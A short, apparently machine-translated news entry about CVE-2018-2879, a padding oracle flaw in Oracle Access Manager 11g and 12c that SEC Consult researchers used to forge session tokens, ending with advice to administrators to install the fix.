Oracle Access Manager (OAM)

2018

In Oracle Access Manager (OAM) vulnerability (CVE-2018-2879) allowing to perform the attack of padding oracle is detected. With its help the malefactor can bypass an authentication mechanism and issue himself for the owner of any user account. Vulnerability is connected with the cryptographic format used by OAM and mentions versions of OAM 11g and 12c.

OAM is the component of the Oracle Fusion Middleware platform providing authentication in web applications of different types. As a rule, the Web server providing access to the application is equipped with a component for authentication of users (Oracle WebGate). The user requesting a protected resource from the Web server is redirected for authentication on OAM. Then OAM carries out user authentication (by the password and a name) and redirects it back to the web application. As authentication is performed on a centralized basis to get access to any application protected by OAM, it is enough to user to be authenticated only once.

According to researchers of SEC Consult company, in OAM are the vulnerability allowing to cipher and decrypt the data transferred between OAM and Web servers. With its help to researchers it was succeeded to create the valid token of a session, to cipher it, to send to the Web server and to get access to protected resources as the user who was already authenticated using OAM.

To administrators of OAM it is strongly recommended to set the updating correcting this vulnerability. The attack using vulnerability is shown in video below.